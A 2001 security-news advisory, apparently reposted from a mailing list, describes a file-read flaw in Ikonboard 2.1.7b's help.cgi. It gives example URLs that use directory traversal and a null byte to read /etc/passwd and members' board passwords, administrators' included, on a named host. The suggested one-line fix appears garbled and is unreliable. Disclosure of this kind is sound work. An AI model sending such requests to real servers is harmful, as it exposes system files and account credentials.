Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Ikonboard permission vulnerability

Ikonboard permission vulnerability

by phiber on March 12th, 2001 There is another bug in the Ikonboard. A malicious user can read any file on the remote system with the privileges of the web server.




Ikonboard version: 2.1.7b

Example:



http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

- would show the password file, if it is readable with the privileges of
the web server.



http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/.cgi%00

- replace with the member name and it shows you his/her
board-password.

(works with Administrator accounts too)



No patches yet available, vendor notified.

Quick fix:

You could fix the script temporary by inserting the following line under
line 45 in 'help.cgi':



$inhelpon =~ s////g;



This is lame, but it works.

Contributed by Martin J. Muench on a BT mailing list


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »